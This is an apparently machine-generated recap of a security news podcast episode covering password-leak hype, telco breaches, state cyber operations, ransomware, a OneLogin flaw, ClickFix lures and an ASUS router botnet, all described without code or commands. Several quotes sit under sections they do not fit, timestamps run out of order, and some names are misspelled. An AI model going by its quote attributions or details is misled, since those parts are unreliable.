Risky Business #797 – Stuxnet vs Massive Ordnance Penetrators
Released on June 25, 2025
Hosts: Patrick Gray and Adam Boileau

Introduction

In episode #797 of Risky Business, hosts Patrick Gray and Adam Boileau delve into a wide array of pressing information security topics. From debunking massive password leak claims to exploring sophisticated cyber threats against critical infrastructure, the duo provides insightful analysis and expert commentary on the latest developments in the cybersecurity landscape.

Debunked Password Leak of 16 Billion Passwords

The episode kicks off with a discussion about a sensational news story claiming a massive leak of 16 billion passwords—a figure so astronomical it defies credibility.

Patrick Gray (00:00):
"Did you hear that there's been a huge password leak of 16 billion passwords? Of course, this has been a dodgy news item that has somehow managed to escape from a niche outlet into the mainstream media."

Adam Boileau (01:16):
"It is as many people, you know, kind of expect, you know, just a repackaging of a bunch of additional existing credential dumps..."

The hosts clarify that the supposed leak is likely an aggregation of previously stolen credentials without any deduplication, making the 16 billion figure misleading. Despite its dubious origins, the story highlights crucial best practices: using unique passwords for each service, leveraging password managers, enabling multi-factor authentication (MFA), and adopting modern passkeys.

Telco Breaches by Salt Typhoon

Patrick and Adam shed light on recent cybersecurity breaches targeting telecommunications companies, attributed to the Salt Typhoon group.

Adam Boileau (04:55):
"They shelled the box and then set it up for intelligence collection and presumably moved laterally around the network and had a good rummage because that's what you do when you hack a telco."

Patrick Gray (04:27):
"It looks like, yeah, viasat and some mob in Canada have disclosed that they've experienced breaches as a result of this group."

Salt Typhoon, known for its intelligence-oriented cyber operations, exploited unpatched vulnerabilities in Cisco’s iOS XE devices to infiltrate and gather intelligence from targeted telcos. The breaches underscore the importance of timely patch management and robust network security practices.

US Cyber Strikes and GPS Jamming in Iran

The hosts discuss the United States' cyber operations against Iran, focusing on GPS jamming in the strategically vital Strait of Hormuz.

Patrick Gray (06:04):
"Some of the quality humor on this one as well. I think someone pre-generated every like 4 and 6 and 8 digit number or something, whacked it in a database and described it as a breach of every single OTP code."

Adam Boileau (07:02):
"Anything that kind of messes up with these systems does have some downstream consequences."

General Dan Kane, Chairman of the Joint Chiefs of Staff, acknowledged Cyber Command's role in these strikes, although specific actions remained undisclosed. The GPS jamming led to anomalies in ship tracking, illustrating the tangible impacts of cyber interference on maritime operations.

Iran’s Cyber Activities Against Albanian Municipalities

The conversation shifts to Iran’s cyber offensives targeting Albanian municipal systems, particularly against the MEK (Mujahedin-e Khalq) opposition group.

Adam Boileau (16:11):
"Jeffrey Lewis, that's right. Yeah, yeah, yeah, yeah. So if you want to hear Dimitri interviewing Jeffrey Lewis about that, I highly recommend it."

Patrick Gray (17:20):
"And they're like, really not great as well because you think, oh, Iranian opposition, they've got to be good. And it's like, well, not really. They're quite horrible as well."

Iranian cyber actors disrupted municipal functions in Albania, affecting services such as child registration for kindergarten. This form of cyber retaliation against opposition abroad highlights the expanding frontiers of cyber warfare.

Ransomware Attack on Tonga's Ministry of Health

The hosts address the alarming ransomware attack on Tonga’s Ministry of Health, a small nation with limited resources.

Patrick Gray (19:25):
"It's a very, very dumb I think awaiting sentencing at this point. But this happened back in like April last year..."

Adam Boileau (20:26):
"It's pretty hard. It sounds like Australia has dispatched some incident responders to help..."

The ransomware incident paralyzed Tonga’s healthcare services, demonstrating how cybercriminals exploit smaller nations’ vulnerabilities. Australia’s swift response in dispatching incident responders underscores the importance of international cooperation in mitigating cyber threats.

Arrests Related to Ryuk and Revil Ransomware

Patrick and Adam cover the recent arrests linked to notorious ransomware strains, highlighting ongoing law enforcement efforts against cybercriminals.

Adam Boileau (21:40):
"This guy, I think they see something like what, $600,000 worth of crypto, nine luxury cars and 24 bits of land."

Patrick Gray (22:38):
"They were arrested for carding and yeah, they've now been released for time served after a few years."

A Ryuk-associated individual was extradited from Ukraine to the U.S., while Russian authorities released several Revil members after serving time for payment card fraud. These cases illustrate the global nature of ransomware operations and the challenges in prosecuting cybercriminals across jurisdictions.

SpectreOps Research on OneLogin Identity Provider Exploit

The episode delves into a concerning vulnerability within OneLogin’s identity provider (IDP) system, uncovered by SpectreOps.

Adam Boileau (23:21):
"They were able to impersonate every user in that particular company's single sign on system."

Patrick Gray (24:53):
"This is the problem with putting everything up in the cloud is right."

A critical flaw allowed attackers to generate authentication tokens, enabling impersonation of users. The delayed and inefficient response from OneLogin in addressing the vulnerability underscores the risks associated with reliance on cloud-based identity services and the need for more agile mitigation strategies.

Libxml2 Maintainer’s Frustration and Security Policy

Patrick and Adam discuss the challenges faced by the sole maintainer of the widely-used Libxml2 library, highlighting broader issues in open-source software security.

Adam Boileau (27:05):
"It is foolish to use this software to process untrusted data."

Patrick Gray (29:22):
"Yep, Mic drop."

The Libxml2 maintainer, overwhelmed by security bug reports, has adopted a stringent security policy, discouraging the use of Libxml2 with untrusted data. This candid stance reflects the difficulties single maintainers face in managing critical open-source projects and the potential risks for organizations relying on such libraries without adequate support.

Social Engineering Campaigns Targeting Advanced Users

The hosts explore sophisticated social engineering tactics aimed at high-profile targets, such as academics and think tankers.

Adam Boileau (32:16):
"It's a cunning campaign because it exploits that lack of understanding about how all these systems work."

Patrick Gray (39:42):
"If you run big estates of Windows users, probably this should be on the list of things that you should spot."

Attackers impersonated legitimate entities to trick users into generating application-specific passwords, facilitating unauthorized access to sensitive accounts. These campaigns exploit the complexities of modern authentication systems, underscoring the necessity for user education and enhanced security measures.

ClickFix and FileFix Attack Vectors

Patrick and Adam highlight two particularly inept yet effective attack methods—ClickFix and FileFix—that rely on tricking users into executing malicious commands.

Adam Boileau (35:43):
"People fall for it. I know, you know, I was surprised when I saw this and went, you know, like, surely, surely no one would."

Patrick Gray (37:57):
"I don't think this is as much of a risk to corporate Environments as just, you know, normal home users."

ClickFix tricks users into pasting commands into the Run dialog, while FileFix manipulates the Windows Explorer address bar to execute PowerShell commands. Though rudimentary, these tactics exploit common user behaviors, making them surprisingly effective despite their simplicity.

Veeam’s Patching Issues with .NET Deserialization Bug

The conversation shifts to Veeam’s ongoing struggles in patching a critical .NET deserialization vulnerability.

Adam Boileau (39:42):
"The bug in question that they patched is a .NET deserialization bug."

Patrick Gray (40:46):
"Same sort of vibes here, so boo to Veeam."

Veeam’s approach of blacklisting specific deserialization techniques is proving insufficient, necessitating a move towards more robust, white-list based filtering to effectively mitigate the vulnerability.

Asus Router Botnet Detection (Sponsor Interview)

The highlight of the episode is an exclusive interview with Andrew Morris from Gray Noise Intelligence, discussing the discovery of a botnet composed of ASUS routers.

Andrew Morris (46:49):
"They did not drop malware. They used the baked in ssh, the drop bear ssh..."

Patrick Gray (50:33):
"Yeah. But do you throw it into a wood chipper or can you actually fix it?"

Gray Noise detected a botnet exploiting ASUS routers by injecting SSH keys, ensuring persistence even through firmware updates. The backdoor was stored in non-volatile memory, making standard updates ineffective. Addressing such compromised devices often requires physical intervention, such as disconnecting and discarding the infected hardware.

Fake WiFi Access Points in Perth for Credential Harvesting

In the final segment, Patrick and Adam discuss a case where an individual set up rogue WiFi access points in airports and even on airplanes to harvest credentials.

Patrick Gray (42:00):
"What's really interesting here is like I think it was air crew or someone who noticed something weird and that's how he got caught."

Adam Boileau (44:29):
"You aren't getting to NORDVPN until after you've been through this captive portal process. So."

The perpetrator exploited captive portals to trick users into providing sensitive information, such as iCloud credentials. The swift detection and apprehension by vigilant airline staff highlight the effectiveness of human oversight in combating such low-tech yet impactful attacks.

Conclusion

Episode #797 of Risky Business offers a comprehensive overview of current cybersecurity threats and vulnerabilities. From the persistence of botnets in consumer hardware to the evolving tactics of cybercriminals and state actors, hosts Patrick Gray and Adam Boileau provide valuable insights into safeguarding against an increasingly complex threat landscape. The episode underscores the importance of proactive security measures, robust patch management, user education, and international cooperation in mitigating cyber risks.

Notable Quotes:

• Adam Boileau (32:16):
  "It's a cunning campaign because it exploits that lack of understanding about how all these systems work."

• Adam Boileau (27:05):
  "It is foolish to use this software to process untrusted data."

• Andrew Morris (50:50):
  "Rip it off the wall and into the wood chipper."

This summary is intended to provide a detailed and engaging overview of the podcast episode for listeners and non-listeners alike, capturing all essential discussions, insights, and conclusions.